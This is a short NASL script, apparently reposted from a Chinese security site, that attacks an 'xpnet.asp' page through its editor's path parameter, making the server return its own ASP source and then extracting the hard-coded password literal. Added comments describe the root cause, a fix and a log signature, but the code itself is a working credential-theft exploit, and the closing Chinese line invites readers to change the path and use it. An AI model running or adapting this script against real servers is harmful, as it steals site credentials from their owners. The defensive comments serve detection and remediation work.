作者:zhouzhen http://www.powers.com.cn/
# Purpose: source-disclosure check against an "xpnet.asp" page. The request below asks the
# page's editor function (id=edit) to load a server-side file named by the "path" parameter;
# if the server echoes that file's source back, the script greps the response for the ASP
# "if ... password ... = ... then" comparison and prints the literal it compares against.
# Defender's notes:
#   - Root cause (as exercised here): a path parameter that names a server-side file whose
#     contents are returned to the client, combined with a credential hard-coded in ASP source.
#     Fix both: never serve source via a client-supplied path (whitelist allowed files), and
#     move credentials out of the page source into a store the web tier cannot read back.
#   - Detection: web-server access logs showing requests to xpnet.asp with "id=edit&path="
#     pointing at a .asp file are the signature of this probe.
port=80;
# NOTE(review): return value is not checked; on connection failure soc is false/NULL and the
# sends below would still be attempted. The socket is also never closed.
soc = http_open_socket(port);
# Request line: path= names the same page (xpnet.asp) so its own source is returned.
send(socket:soc, data:'GET /xpnet.asp?id=edit&path=/xpnet.asp&attrib= HTTP/1.1\r\n');
send(socket:soc, data:'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n');
# NOTE(review): Referer and Host are hard-coded to the author's lab address (192.168.20.21)
# rather than the host the socket was opened to; a name-based virtual host may not route this.
send(socket:soc, data:'Referer: http://192.168.20.21/xpnet.asp\r\n');
send(socket:soc, data:'Accept-Language: zh-cn\r\n');
send(socket:soc, data:'Accept-Encoding: gzip, deflate\r\n');
send(socket:soc, data:'User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; .NET CLR 1.1.4322)\r\n');
send(socket:soc, data:'Host: 192.168.20.21\r\n');
send(socket:soc, data:'Connection: Keep-Alive\r\n');
# The cookie replays a fixed session id and a "password=" value from the author's own test
# session; whether the edit function checks this cookie cannot be told from here.
send(socket:soc, data:'Cookie: ASPSESSIONIDQSQCCRQA=JEEPCLODEJKNNNHBBKPHNCGI; password=allen\r\n');
# Blank line terminates the request headers.
send(socket:soc, data:'\r\n');
# Read up to 800000 bytes of the response (headers plus the echoed page source).
mes=recv(socket:soc,length:800000);
#display(mes);
# Look for the ASP line that compares the submitted password against a literal.
line=egrep(pattern:"password.*=.*then",string:mes);
#display(line);
if(line)
{
# Keep only the right-hand side of the comparison (everything between "=" and " then").
# Because .* is greedy, the capture includes any surrounding quotes present in the source.
pass=ereg_replace(pattern:"if trim.request\.form.*password.*=(.*) then",string:line,replace:"\1");
display("password:", pass);
}
呵呵。直接得到密码(不包括引号的部分)。路径大家改改。用 NASL 脚本写的。
